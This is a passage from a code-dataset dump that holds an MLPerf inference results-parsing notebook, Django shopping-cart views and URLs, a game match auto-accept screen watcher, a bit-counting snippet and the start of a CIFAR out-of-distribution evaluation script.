\"SSDLite-MobileNet-v2\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/ssdlite_mobilenet_v2_coco_2018_05_09.tar.gz\",\n \"width\" : 300,\n \"height\" : 300,\n },\n 'yolo-v3' : {\n \"name\" : \"YOLO-v3\",\n \"url\" : \"https://zenodo.org/record/3386327/files/yolo_v3_coco.tar.gz\",\n \"width\" : 416,\n \"height\" : 416,\n \"provenance\" : \"https://github.com/YunYang1994/tensorflow-yolov3/\"\n }\n}\n\n\n# ## Code\n\n# In[ ]:\n\n\n# We use two modes: the 'spreadsheet' mode tries to mimic the official submission table as much as possible;\n# the 'dashboard' mode uses a more appropriate layout for the CK dashboard.\ndef get_data(results_path=results_path, mode='spreadsheet'):\n dfs = []\n # FOR EACH division.\n for division in divisions:\n #if division == 'open': continue # skip\n # FOR EACH submitter.\n submitters_dir = os.path.join(results_path, division)\n submitters = [ fn for fn in os.listdir(submitters_dir) if os.path.isdir(os.path.join(submitters_dir, fn)) ]\n for submitter in submitters:\n # Selectively filter out submitters.\n #all_submitters_closed = [ 'Alibaba', 'CentaurTechnology', 'DellEMC', 'dividiti', 'FuriosaAI', 'Google', 'Habana', 'Hailo', 'Intel', 'NVIDIA', 'Qualcomm', 
'Tencent' ]\n #if division == 'closed' and submitter not in all_submitters_closed: continue\n #all_submitters_open = [ 'dividiti', 'Habana', 'Inspur', 'NVIDIA', 'Qualcomm' ]\n #if division == 'open' and submitter not in all_submitters_open: continue\n # FOR EACH system.\n results_dir = os.path.join(submitters_dir, submitter, 'results')\n systems = [ fn for fn in os.listdir(results_dir) if os.path.isdir(os.path.join(results_dir, fn)) ]\n for system in systems:\n system_dir = os.path.join(results_dir, system)\n system_json_name = system + '.json'\n system_json_path = os.path.join(submitters_dir, submitter, 'systems', system_json_name)\n with open(system_json_path) as system_json_file:\n system_json = json.load(system_json_file)\n\n # Category.\n if system_json['status'] in [ 'available', 'Available' ]:\n category = 'Available'\n elif system_json['status'] in [ 'preview', 'Preview' ]:\n category = 'Preview'\n elif system_json['status'] in [ 'rdi', 'RDI', 'rdo', 'RDO' ]:\n category = 'Research, Development, Other'\n elif system_json['status'] in [ 'Unofficial', 'unofficial' ]:\n category = 'Unofficial'\n else:\n raise Exception(\"Unsupported category '%s'!\" % (system_json['status']))\n\n # System details.\n system_name = system_json['system_name']\n system_list = system.split('-')\n system_id = system_list[0] \n\n # Processor (CPU).\n processor = system_id_to_processor.get(system_id, system_json.get('host_processor_model_name', 'N/A'))\n processor_num = int(system_json.get('host_processors_per_node', 0))\n\n # Accelerator.\n # Tencent: https://github.com/mlperf/submissions_inference_0_5/issues/285\n accelerator_name = system_json.get('accelerator_model_name', 'N/A')\n accelerator_num = int(system_json.get('accelerators_per_node', 0))\n accelerator = accelerator_name_to_accelerator.get(accelerator_name, accelerator_name)\n\n # Software (framework).\n software = system_json['framework']\n\n # Default form factors and notes.\n # NB: Using space rather than empty string turns out better for dashboard.\n ff_m = ff_d = ff_s = ff_e = ' '\n notes = ' '\n\n # Submitter-specific form factors and notes.\n submitter_str = submitter\n if submitter == 'dividiti':\n # Form factors.\n if system_id in [ 'hikey960', 'firefly', 'rpi4' ]: ff_e = 'x'\n if system_id in [ 'mate10pro', 'hikey960' ]: ff_m = 'x'\n if system_id in [ 'velociti' ]: ff_d = 'x'\n # Notes.\n if system_id == 'hikey960':\n notes = 'Mobile chip in embedded form factor (development board).'\n if division == 'open':\n # Object Detection is collaboration between dividiti and Politecnico di Milano.\n if system_id == 'velociti': submitter_str = 'dividiti + PoliMi'\n if system == 'velociti-tensorflow-v1.14-cpu':\n notes = 'In the Other category, since this Intel CPU is no longer available (end-of-life).'\n elif submitter == 'Alibaba':\n ff_s = 'x'\n if system_id == 'alibaba_cloud_t4':\n notes = 'ECC off'\n elif submitter == 'DellEMC':\n ff_s = 'x'\n if system_id == 'R740_T4x4_tensorrt':\n notes = 'ECC off'\n elif submitter == 'Google':\n ff_s = 'x'\n system_name = '{:d}x Cloud {:s}'.format(int(accelerator_num/8), accelerator)\n elif submitter == 'Habana':\n ff_d = ff_s = ff_e = 'x'\n if division == 'open':\n if system_id == 'Goya_fast_latency':\n notes = 'Low latency results ...'\n if system_id == 'Goya_med_latency':\n notes = 'Medium latency results ...' 
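 # Goya appears twice: a fast (low-latency) and a medium-latency operating point.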
\n elif submitter == 'Intel':\n if system_id == 'ICL':\n ff_m = 'x'\n else:\n ff_s = 'x'\n elif submitter == 'NVIDIA':\n if system_id == 'Xavier':\n ff_e = 'x'\n if division == 'closed':\n notes = 'GPU and both DLAs are used in Offline and MultiStream'\n elif system_id == 'TitanRTXx4':\n ff_e = ff_s = ff_d = 'x'\n elif system_id == 'T4x8':\n ff_e = ff_s = 'x'\n elif system_id == 'T4x20':\n ff_s = 'x'\n else:\n raise Exception(\"Unsupported NVIDIA system '%s'!\" % system_id) \n elif submitter == 'Qualcomm':\n ff_m = 'x'\n if division == 'open':\n notes = 'Median latency. MultiStream: Both Hexagon Vector Extensions (HVX) and Hexagon Tensor Accelerator (HTA).'\n if division == 'closed':\n notes = 'Hexagon Vector Extensions being used.'\n elif submitter == 'Tencent':\n ff_s = 'x'\n # Preview only.\n elif submitter == 'CentaurTechnology':\n ff_d = ff_s = ff_e = 'x'\n elif submitter == 'Hailo':\n ff_d = ff_e = 'x'\n # RDO only.\n elif submitter == 'FuriosaAI':\n ff_d = ff_s = ff_e = 'x'\n # Open only.\n elif submitter == 'Inspur':\n ff_s = 'x'\n else:\n raise Exception(\"Unsupported division/submitter combination '%s'/'%s'!\" % (division, submitter))\n\n # Create DataFrame for each row of the final table based on the division, submitter and system.\n data = [{\n # \n 'ID' : '-', # TODO: Fill in later.\n 'Submitter' : submitter_str,\n 'System' : system_name,\n 'Benchmark' : '-', # TODO: Fill in later.\n # Processor.\n 'Processor' : processor,\n 'Processor #' : processor_num,\n # Accelerator.\n 'Accelerator' : accelerator,\n 'Accelerator #' : accelerator_num if accelerator_num != '0' else '',\n # Software.\n 'Software' : software,\n # Form factor.\n 'FF_M' : ff_m,\n 'FF_D' : ff_d,\n 'FF_S' : ff_s,\n 'FF_E' : ff_e,\n # Details. Code. Notes.\n 'Details' : 'https://github.com/mlperf/inference_results_v0.5/blob/master/{}/{}/systems/{}'. \\\n format(division, submitter, system_json_name),\n 'Code' : 'https://github.com/mlperf/inference_results_v0.5/tree/master/{}/{}/code'. 
\\\n format(division, submitter),\n 'Notes' : notes,\n # Misc.\n 'Division' : division_to_str.get(division, division),\n 'Category' : category,\n 'Task' : '-', # TODO: Fill in later.\n 'Scenario' : '-', # TODO: Fill in later.\n }]\n # NB: 'Accelerator #' is important to sort Google's submissions correctly (not lexicographically).\n index = [\n 'Division', 'Category', 'Submitter', 'Accelerator #', 'System', 'Software', 'Benchmark' #, 'Task', 'Scenario'\n ]\n # Reset all scores.\n if mode == 'spreadsheet':\n data[0].update({ score : '' for score in score_columns })\n\n # FOR EACH benchmark.\n benchmarks = [ fn for fn in os.listdir(system_dir) if os.path.isdir(os.path.join(system_dir, fn)) ]\n for (benchmark, benchmark_idx) in zip(benchmarks, range(len(benchmarks))):\n is_last_benchmark = (benchmark_idx == len(benchmarks) - 1)\n # Tencent and Inspur use resnet50.\n benchmark_name = 'resnet' if benchmark == 'resnet50' else benchmark\n # Benchmark (with notes).\n benchmark_dict = non_imagenet_benchmarks.get(benchmark_name)\n if benchmark_dict:\n width = benchmark_dict['width']\n height = benchmark_dict['height']\n else:\n if benchmark_name.endswith('96'):\n side = 96\n elif benchmark_name.endswith('128'):\n side = 128\n elif benchmark_name.endswith('160'):\n side = 160\n elif benchmark_name.endswith('192'):\n side = 192\n else:\n side = 224\n width = side\n height = side\n if width != -1 and height != -1:\n # Benchmark (width x height).\n benchmark_with_notes = '{} ({}x{})'.format(benchmark_name, width, height)\n else:\n # GNMT.\n benchmark_with_notes = benchmark_name\n # TODO: Rename to 'Model used, if not Closed Division default' for Open.\n data[0]['Benchmark'] = benchmark_with_notes\n\n # FOR EACH scenario.\n benchmark_dir = os.path.join(system_dir, benchmark)\n scenarios = [ fn for fn in os.listdir(benchmark_dir) if os.path.isdir(os.path.join(benchmark_dir, fn)) ]\n for scenario in scenarios:\n if mode != 'spreadsheet':\n data[0].update({ score : '' for score in score_columns })\n scenario_str = scenario_to_str.get(scenario,'')\n if scenario_str not in [ 'SingleStream', 'MultiStream', 'Server', 'Offline' ]: continue\n experiment_dir = os.path.join(benchmark_dir, scenario)\n # Extract accuracy.\n if submitter == 'Hailo' and benchmark == 'ssd-small':\n # https://github.com/mlperf/submissions_inference_0_5/issues/287\n task = 'OD'\n accuracy = 21.920 # ssd-small/SingleStream/accuracy/results.json\n else:\n accuracy_dir = os.path.join(experiment_dir, 'accuracy')\n with open(os.path.join(accuracy_dir, 'accuracy.txt'), 'r') as accuracy_file:\n accuracy_txt = accuracy_file.readlines()\n accuracy_line = accuracy_txt[-1]\n if accuracy_line.startswith('mAP'):\n task = 'OD'\n match = re.match('mAP\\=([\\d\\.]+)\\%', accuracy_line)\n accuracy = float(match.group(1))\n elif accuracy_line.startswith('accuracy'):\n task = 'IC'\n match = re.match('accuracy=(.+)%, good=(\\d+), total=(\\d+)', accuracy_line)\n accuracy = float(match.group(1))\n elif accuracy_line.startswith('BLEU'):\n task = 'MT'\n match = re.match('BLEU:\\s*(.+)', accuracy_line)\n accuracy = float(match.group(1))\n else:\n pprint(accuracy_txt)\n raise Exception('Failed to extract accuracy information from \"%s\"' % accuracy_line)\n data[0]['Task'] = { 'IC': 'Image Classification', 'OD': 'Object Detection', 'MT': 'Machine Translation' }.get(task)\n \n if scenario_str in [ 'SingleStream', 'MultiStream', 'Offline', 'Server' ]:\n data[0]['Scenario'] = scenario_to_str.get(scenario, scenario)\n if submitter == 'Tencent' and scenario_str in [ 
'SingleStream', 'Offline' ]:\n # https://github.com/mlperf/submissions_inference_0_5/issues/286\n performance_dir = os.path.join(experiment_dir, 'performance')\n else:\n # TODO: Iterate over 5 runs for Server.\n performance_dir = os.path.join(experiment_dir, 'performance', 'run_1') \n with open(os.path.join(performance_dir, 'mlperf_log_summary.txt'), 'r') as summary_file:\n summary_txt = summary_file.readlines()\n for line in summary_txt:\n if re.match(\"Scenario\", line):\n # NB: LoadGen scenario strings have spaces between 'Single'/'Multi' and 'Stream'.\n loadgen_scenario = line.split(\": \",1)[1].strip()\n loadgen_scenario_str = scenario_to_str[loadgen_scenario]\n if loadgen_scenario_str != scenario_str:\n raise Exception(\"Expected '%s', parsed '%s'!\" % (scenario_str, loadgen_scenario_str ))\n continue\n if scenario_str == \"SingleStream\":\n if re.match(\"90th percentile latency\", line):\n score = line.split(\": \",1)[1].strip()\n continue\n if scenario_str == \"MultiStream\":\n if re.match(\"Samples per query\", line):\n score = line.split(\": \",1)[1].strip()\n continue\n if scenario_str == \"Server\":\n if re.match(\"Scheduled samples per second\", line):\n score = line.split(\": \",1)[1].strip()\n continue\n if scenario_str == \"Offline\":\n if re.match(\"Samples per second\", line):\n score = line.split(\": \",1)[1].strip()\n continue\n if scenario_str == 'SingleStream':\n time_ns = int(score)\n time_ms = time_ns * 1e-6\n elif scenario_str == 'MultiStream':\n num_streams = int(score)\n elif scenario_str == 'Server':\n queries_per_second = float(score)\n elif scenario_str == 'Offline':\n samples_per_second = float(score)\n else:\n raise Exception(\"Unsupported scenario '%s'!\" % scenario_str)\n\n # Tasks.\n if mode == 'spreadsheet': \n ic1 = (task=='IC' and benchmark.startswith('mobilenet'))\n ic2 = (task=='IC' and benchmark.startswith('resnet'))\n od1 = (task=='OD' and benchmark=='ssd-small')\n od2 = (task=='OD' and (benchmark=='ssd-large' or system_id=='velociti'))\n nmt = (task=='MT')\n else:\n ic1 = (task=='IC')\n ic2 = False\n od1 = (task=='OD')\n od2 = False\n nmt = (task=='MT')\n if scenario_str == 'SingleStream':\n performance_str = '{:.03f}'.format(time_ms)\n accuracy_str = '{:.03f}'.format(accuracy)\n if ic1:\n data[0]['A_IC1_SS'] = accuracy_str\n data[0]['P_IC1_SS'] = performance_str\n elif ic2:\n data[0]['A_IC2_SS'] = accuracy_str\n data[0]['P_IC2_SS'] = performance_str\n elif od1:\n data[0]['A_OD1_SS'] = accuracy_str\n data[0]['P_OD1_SS'] = performance_str\n elif od2:\n data[0]['A_OD2_SS'] = accuracy_str\n data[0]['P_OD2_SS'] = performance_str\n elif nmt:\n data[0]['A_NMT_SS'] = accuracy_str\n data[0]['P_NMT_SS'] = performance_str\n elif scenario_str == 'MultiStream':\n performance_str = '{:d}'.format(num_streams)\n accuracy_str = '{:.03f}'.format(accuracy)\n if ic1:\n data[0]['A_IC1_MS'] = accuracy_str\n data[0]['P_IC1_MS'] = performance_str\n elif ic2:\n data[0]['A_IC2_MS'] = accuracy_str\n data[0]['P_IC2_MS'] = performance_str\n elif od1:\n data[0]['A_OD1_MS'] = accuracy_str\n data[0]['P_OD1_MS'] = performance_str\n elif od2:\n data[0]['A_OD2_MS'] = accuracy_str\n data[0]['P_OD2_MS'] = performance_str\n elif nmt:\n data[0]['A_NMT_MS'] = accuracy_str\n data[0]['P_NMT_MS'] = performance_str\n elif scenario_str == 'Server':\n performance_str = '{:.03f}'.format(queries_per_second)\n accuracy_str = '{:.03f}'.format(accuracy)\n if ic1:\n data[0]['A_IC1_S'] = accuracy_str\n data[0]['P_IC1_S'] = performance_str\n elif ic2:\n data[0]['A_IC2_S'] = accuracy_str\n 
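# Server performance is recorded in scheduled queries per second (parsed from the LoadGen summary above).\n 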
data[0]['P_IC2_S'] = performance_str\n elif od1:\n data[0]['A_OD1_S'] = accuracy_str\n data[0]['P_OD1_S'] = performance_str\n elif od2:\n data[0]['A_OD2_S'] = accuracy_str\n data[0]['P_OD2_S'] = performance_str\n elif nmt:\n data[0]['A_NMT_S'] = accuracy_str\n data[0]['P_NMT_S'] = performance_str\n elif scenario_str == 'Offline':\n performance_str = '{:.03f}'.format(samples_per_second)\n accuracy_str = '{:.03f}'.format(accuracy)\n if ic1:\n data[0]['A_IC1_O'] = accuracy_str\n data[0]['P_IC1_O'] = performance_str\n elif ic2:\n data[0]['A_IC2_O'] = accuracy_str\n data[0]['P_IC2_O'] = performance_str\n elif od1:\n data[0]['A_OD1_O'] = accuracy_str\n data[0]['P_OD1_O'] = performance_str\n elif od2:\n data[0]['A_OD2_O'] = accuracy_str\n data[0]['P_OD2_O'] = performance_str\n elif nmt:\n data[0]['A_NMT_O'] = accuracy_str\n data[0]['P_NMT_O'] = performance_str\n else:\n print('Skipping unsupported task/scenario combination!')\n continue\n if mode != 'spreadsheet':\n df = pd.DataFrame(data)\n df = df.set_index(index)\n dfs.append(df)\n # END OF FOR EACH scenario\n if mode == 'spreadsheet':\n # For closed, multiple benchmarks can share the same row, so the Benchmark field can be misleading.\n if division == 'closed': data[0]['Benchmark'] = ''\n if is_last_benchmark or (division == 'open' and submitter == 'dividiti'):\n df = pd.DataFrame(data)\n df = df.set_index(index)\n dfs.append(df)\n # For the spreadsheet mode, include multiple benchmarks per row.\n # END OF FOR EACH benchmark\n # END OF FOR EACH system\n # END OF FOR EACH submitter\n # END OF FOR EACH division\n \n # Concatenate all thus constructed DataFrames (i.e. stack on top of each other).\n df = pd.concat(dfs)\n # Temporarily capitalize the first letter in 'dividiti' for correct sorting and then back.\n df = df.rename(index={'dividiti':'Dividiti', 'dividiti + PoliMi':'Dividiti + PoliMi'}).sort_index(ascending=True).rename(index={'Dividiti':'dividiti', 'Dividiti + PoliMi':'dividiti + PoliMi'})\n # Reset the index, but keep Division and Category there.\n df = df.reset_index(level=index[2:])\n df['ID'] = [ 'Inf-0.5-{:03d}'.format(ID) for ID in range(1, len(df)+1) ]\n # Mimic the official template.\n columns = [ 'ID', 'Submitter', 'System', 'Benchmark' ]\n columns += score_columns\n columns += [ 'Processor', 'Processor #', 'Accelerator', 'Accelerator #', 'Software',\n 'FF_M', 'FF_D', 'FF_S', 'FF_E', 'Details', 'Code', 'Notes' ]\n # Finalize the table.\n if mode == 'spreadsheet':\n df = df[columns]\n else:\n df = df.reset_index().set_index(keys=[ 'ID', 'Division', 'Category', 'Submitter', 'System', 'Benchmark' ], drop=False)\n df[score_columns] = df[score_columns].apply(pd.to_numeric).astype('float32')\n \n return df\n\n\n# In[ ]:\n\n\ndf = get_data(results_path=results_path, mode='spreadsheet')\ndisplay_in_full(df)\n\n\n# ## Dump the table for the CK dashboard\n\n# In[ ]:\n\n\ncache_path\n\n\n# In[ ]:\n\n\n# Always clean the cache while in the development mode.\nget_ipython().system('rm -f $cache_path')\n\n\n# In[ ]:\n\n\nresults_path\n\n\n# In[ ]:\n\n\nif os.path.exists(cache_path):\n # Load the table from cache.\n print('Loading the results table from cache ...')\n df = pd.read_pickle(cache_path)\nelse:\n # Store the table in a simplified format.\n print('Storing the results table to cache ...')\n df = get_data(results_path=results_path, mode='dashboard')\n df.to_pickle(path=cache_path, protocol=cache_protocol, compression=cache_compression)\ndisplay_in_full(df)\n\n\n# ## Dump the table into Excel (with separate sheets for Division / 
Category)\n\n# In[ ]:\n\n\n# Create a Pandas Excel writer using XlsxWriter as the engine.\nfrom pandas import ExcelWriter\n# NB: Cannot use dot for 'v0.5', as otherwise the engine complains about an unknown extension.\nxlsx_filename = 'MLPerf Inference v0_5 - Results (Automatically Generated).xlsx'\nxlsx_writer = ExcelWriter(xlsx_filename, engine='xlsxwriter', options={'strings_to_urls': True})\ndf_ = df.droplevel('ID')\nfor division in df.index.unique(level='Division'):\n df_d = df_.loc[division]\n for category in df_d.index.unique(level='Category'):\n df_dc = df_d.loc[category]\n if division == 'Open':\n df_xlsx = df_dc\n elif division == 'Closed':\n df_xlsx = df_dc.drop(labels=['Benchmark']+accuracy_columns, axis=1)\n else:\n continue\n # Write different division and category results to separate sheets. Omit index.\n print('*' * 100)\n print('* Division / Category: %s / %s' % (division, category))\n print('*' * 100)\n if category == 'Research, Development, Other': category = 'RDO' # NB: sheet_name must be =< 31 symbols.\n df_xlsx.to_excel(xlsx_writer, sheet_name='{} - {}'.format(division, category), index=False)\n display_in_full(df_xlsx)\n print('')\nxlsx_writer.save()\nget_ipython().system('cp \"$xlsx_filename\" ~/Downloads')\n\n\n# ## Statistics\n\n# ### Total number of results\n\n# In[ ]:\n\n\n# Performance columns are strings for formatting reasons. Convert the strings to numbers (with NaNs for empty strings),\n# then count the numbers across the columns and finally sum.\nprint(\"#Results: %d\" % df[performance_columns].apply(pd.to_numeric).count(numeric_only=True, axis=0).sum())\n#print(\"#Results/Closed: %d\" % df.loc['Closed'][performance_columns].apply(pd.to_numeric).count(numeric_only=True, axis=0).sum())\n#print(\"#Results/Open: %d\" % df.loc['Open'][performance_columns].apply(pd.to_numeric).count(numeric_only=True, axis=0).sum())\n\n\n# ### Number of results per division per submitter per benchmark\n\n# In[ ]:\n\n\n# indices = [ 'Division', 'Submitter' ]\n# df_num_results_per_division_per_submitter_per_benchmark = df \\\n# .reset_index() \\\n# [indices + performance_columns] \\\n# .set_index(indices) \\\n# .apply(pd.to_numeric) \\\n# .groupby(level=indices).count()\n# display_in_full(df_num_results_per_division_per_submitter_per_benchmark)\n\n\n# In[ ]:\n\n\n# df_num_results_per_division_per_submitter = df_num_results_per_division_per_submitter_per_benchmark.sum(axis=1)\n# df_num_results_per_division_per_submitter\n\n\n# ### Pie charts\n\n# In[ ]:\n\n\n# def plot_num_results(df_num_results_per_submitter, autopct='%1.0f%%', pctdistance=0.8, labeldistance=1.1, topN=5,\n# explode_submitters=['dividiti'], explode_distance=0.05, startangle=0, shadow=False,\n# title='MLPerf Inference v0.5 - Results per Submitter', fname=None, ftype='jpg', color = 'darkgray'):\n\n# df_num_results_per_submitter_descending = pd.DataFrame({\n# 'Submitter' : df_num_results_per_submitter.index,\n# '#Results' : df_num_results_per_submitter.values}) \\\n# .sort_values('#Results', ascending=False)\n\n# df_num_results_per_submitter_topN = df_num_results_per_submitter_descending[:topN].copy()\n\n# df_num_results_per_submitter_others = pd.DataFrame(data = {\n# 'Submitter' : ['Others'],\n# '#Results' : [df_num_results_per_submitter_descending['#Results'][topN:].sum()]})\n\n# df_num_results_per_submitter_topN_and_others = \\\n# pd.concat([df_num_results_per_submitter_topN, df_num_results_per_submitter_others]) \\\n# .set_index('Submitter') \\\n# .sort_values('Submitter', ascending=False)\n\n# results = 
df_num_results_per_submitter_topN_and_others['#Results']\n# submitters = df_num_results_per_submitter_topN_and_others.index\n# explode = [ explode_distance if submitter in explode_submitters else 0 for submitter in submitters ]\n\n# mp.rcParams['figure.dpi'] = default_dpi\n# plt.pie(results, labels=submitters, autopct=autopct,\n# pctdistance=pctdistance, labeldistance=labeldistance,\n# explode=explode, startangle=35, shadow=shadow)\n \n# plt.title(title)\n# plt.tight_layout()\n# if fname is not None:\n# # A lazy way to use the default file name.\n# if fname == '': fname = '{}.{}'.format(title, ftype) \n# plt.savefig(fname=fname, format=ftype, dpi=100, quality=90, optimize=True, bbox_inches='tight',\n# facecolor=color, edgecolor=color)\n# plt.show()\n\n\n# #### Plot by division\n\n# In[ ]:\n\n\n# for division, topN in zip([ 'Closed', 'Open' ], [ 10, 3 ]):\n# explode_submitters = [] if division == 'Open' else ['dividiti']\n# plot_num_results(\n# df_num_results_per_division_per_submitter.loc[division],\n# title='MLPerf Inference v0.5 - {} Division - Results per Submitter'.format(division),\n# topN=topN, explode_submitters=explode_submitters\n# )\n\n\n# #### Plot all\n\n# In[ ]:\n\n\n# plot_num_results(\n# df_num_results_per_division_per_submitter.droplevel('Division').groupby(level='Submitter').sum(),\n# topN=8, explode_submitters=['dividiti', 'dividiti + PoliMi'], fname='')\n\n\n# ## Display HTML with embedded links (TODO)\n\n# In[ ]:\n\n\n# df = df.set_index(['Submitter', 'System', 'Benchmark', 'Software'], append=True)\n# def link_code(url): return '<a target=\"_blank\" href=\"{}\">Code</a>'.format(url)\n# def link_details(url): return '<a target=\"_blank\" href=\"{}\">Details</a>'.format(url)\n# display_in_full(df.style.format({'Code': link_code, 'Details': link_details}))\n\n","repo_name":"ctuning/ck-mlperf","sub_path":"jnotebook/mlperf-inference-v0.5/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":38784,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"95"}
+{"seq_id":"19356954793","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_POST, require_http_methods\nfrom main.models import Product\nfrom .cart import Cart\nfrom django.http import JsonResponse\n\n@require_POST\ndef cart_add(request, product_id):\n cart = Cart(request)\n data = {\n 'product_quantity': '',\n 'cart_length': '',\n }\n product = get_object_or_404(Product, id=product_id)\n quantity = request.POST.get('quantity')\n if quantity:\n cart.add(product=product,\n quantity=int(quantity))\n data['product_quantity'] = cart.get_product_quantity(product_id)\n \n else:\n cart.add(product=product)\n cart_length = len(cart)\n data['cart_length'] = cart_length\n return JsonResponse(data)\n\n@require_http_methods([\"DELETE\"])\ndef cart_remove(request, product_id):\n cart = Cart(request)\n data = {\n 'message': 'Item successfully removed.',\n 'cart_length': '',\n }\n product = get_object_or_404(Product, id=product_id)\n cart.remove(product)\n cart_length = len(cart)\n data['cart_length'] = cart_length\n return JsonResponse(data)\n\n\ndef cart_detail(request):\n return render(request, 'cart_detail.html')","repo_name":"RudyIlya/SomeStore","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"15597997080","text":"import numpy as np\nimport cv2 as 
cv\n\nimport time\nimport mss\nimport os\n\nimport pydirectinput\n\n\nclass Watcher:\n def __init__(self) -> None:\n self.stc = mss.mss()\n\n path = os.path.dirname(__file__)\n self.img_path = os.path.join(path, \"accept.jpg\")\n\n def match_finder(self):\n img = self.screenshot()\n match_found = cv.imread(self.img_path)\n\n result_try = cv.matchTemplate(img, match_found, cv.TM_CCOEFF_NORMED)\n\n _, mVal, _, mLoc = cv.minMaxLoc(result_try)\n\n return mVal > .9, mLoc\n\n def screenshot(self, left=0, top=0, width=1920, height=1080):\n scr = self.stc.grab({\n 'left': left,\n 'top': top,\n 'width': width,\n 'height': height,\n })\n\n img = np.array(scr)\n img = cv.cvtColor(img, cv.COLOR_BGRA2BGR) # mss grabs BGRA; convert to BGR (cv.IMREAD_COLOR is an imread flag, not a conversion code)\n\n return img\n\n def click(self, x, y, wait=0):\n pydirectinput.moveTo(x, y)\n time.sleep(wait)\n pydirectinput.mouseDown()\n time.sleep(wait)\n pydirectinput.mouseUp()\n\n def watch(self):\n \"\"\"Check whether a match was found and click the accept button.\n \"\"\"\n found, mLoc = self.match_finder()\n x, y = mLoc\n if found:\n self.click(x, y)\n print(\"Match accepted!\")\n time.sleep(5)\n","repo_name":"calvi7/lol-auto-accepter","sub_path":"watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"25623008457","text":"from django.urls import path\nfrom UserApp import views\n\nurlpatterns = [\n path('homepage/', views.homepage, name=\"homepage\"),\n path('productpage/<catg>/', views.productpage, name=\"productpage\"),\n path('singleproduct/<int:dataid>/', views.singleproduct, name=\"singleproduct\"),\n path('savecart/', views.savecart, name=\"savecart\"),\n path('cartpage/', views.cartpage, name=\"cartpage\"),\n path('DeleteItem/<int:dataid>/', views.DeleteItem, name=\"DeleteItem\"),\n path('placeorder/', views.placeorder, name=\"placeorder\"),\n path('savecheck/', views.savecheck, name=\"savecheck\"),\n path('userloginpage/', views.userloginpage, name=\"userloginpage\"),\n path('saveuser/', views.saveuser, name=\"saveuser\"),\n path('userlogin/', views.userlogin, name=\"userlogin\"),\n path('Admin_Logout/', views.Admin_Logout, name=\"Admin_Logout\"),\n]\n","repo_name":"Kirankrishnakr/Frutika","sub_path":"UserApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"3756210892","text":"def countOnes(n):\n c = 0\n i = 0\n while i < 8:\n c += n & 1\n print(n&1, end = \" \") #prints the bits of n, least significant first\n n >>= 1 # right shift by one\n\n\n i +=1\n\n print(\"\\nTotal number of one's is \", c)\n\ncountOnes(20)\n","repo_name":"bikash-das/pythonprograms","sub_path":"countOnes.py","file_name":"countOnes.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"22967593841","text":"from random import seed\nimport numpy as np\nimport os\nimport argparse\nimport torchvision\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torchvision.transforms as trn\nimport torchvision.datasets as dset\nimport torch.nn.functional as F\nfrom models.wrn import WideResNet\nfrom models import ResNet \nfrom Utils.display_results import get_measures, print_measures, print_measures_with_std\nimport Utils.score_calculation as lib\n\nparser = argparse.ArgumentParser(description='Evaluates a CIFAR OOD Detector',\n 
formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n# Setup\nparser.add_argument('--batch_size', type=int, default=128)\nparser.add_argument('--num_class', type=int, default=10)\nparser.add_argument('--num_to_avg', type=int, default=10, help='Average measures across num_to_avg runs.')\nparser.add_argument('--dataset', type=str, default='cifar10', help='dataset name.')\nparser.add_argument('--stored_data_path', type=str, default='/data/ood_detection/data/', help='the path for storing data.')\nparser.add_argument('--score', default='SHE', type=str, help='score options: MSP|Energy|ReAct|HE|SHE|SHE_react|SHE_with_perturbation')\nparser.add_argument('--parallel_list', type=str, default='0',help='give number if want parallel')\nparser.add_argument('--model', type=str, default='resnet18')\n\nparser.add_argument('--resize_val', default=112, type=int, help='transform resize length')\nparser.add_argument('--beita', default=0.01, type=float, help='for HE')\nparser.add_argument('--noise', type=float, default=0.0014, help='pertubation')\nparser.add_argument('--threshold', type=float, default=1.0)\nparser.add_argument('--T', default=1.0, type=float)\nparser.add_argument('--k', default=0.8, type=float)\nparser.add_argument('--metric', type=str, default='inner_product',help='ablation: choose which metric for the SHE')\n\n#parameters for wrn\nparser.add_argument('--layers', default=40, type=int, help='total number of layers')\nparser.add_argument('--widen-factor', default=2, type=int, help='widen factor')\nparser.add_argument('--droprate', default=0.3, type=float, help='dropout probability')\n\nparser.add_argument('--need_penultimate', default=4, type=int,help='choose which layer as the pattern')\n\nargs = parser.parse_args()\nprint(args)\n\nif args.model == 'wrn':\n args.resize_val = 64\nelse:\n args.resize_val = 112\n \nrandom_seed = 12\n\nargs.beita = 0.2 if args.model == 'wrn' else 0.01\n\nos.environ['CUDA_VISIBLE_DEVICES'] = args.parallel_list\ncudnn.benchmark = True\n\n# Set random seed\nseed(random_seed)\nnp.random.seed(random_seed)\ntorch.manual_seed(random_seed)\ntorch.cuda.manual_seed_all(random_seed)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\n\nmean = [0.4914, 0.4822, 0.4465]\nstd = [0.2023, 0.1994, 0.2010]\n\n\nprint('Size of sample is {}*{}'.format(args.resize_val,args.resize_val))\ntransform_all = trn.Compose([\n trn.Resize((args.resize_val,args.resize_val)),\n trn.ToTensor(),\n trn.Normalize(mean, std),\n])\n\n\n\n\nif args.dataset == 'cifar10':\n trainset = torchvision.datasets.CIFAR10(root=args.stored_data_path, train=True, download=True, transform=transform_all)\n train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=4)\n\n test_data = torchvision.datasets.CIFAR10(root=args.stored_data_path, train=False, download=True, transform=transform_all)\n test_loader = torch.utils.data.DataLoader(test_data, batch_size=args.batch_size, shuffle=False, num_workers=4)\n args.num_class = 10\nelif args.dataset == 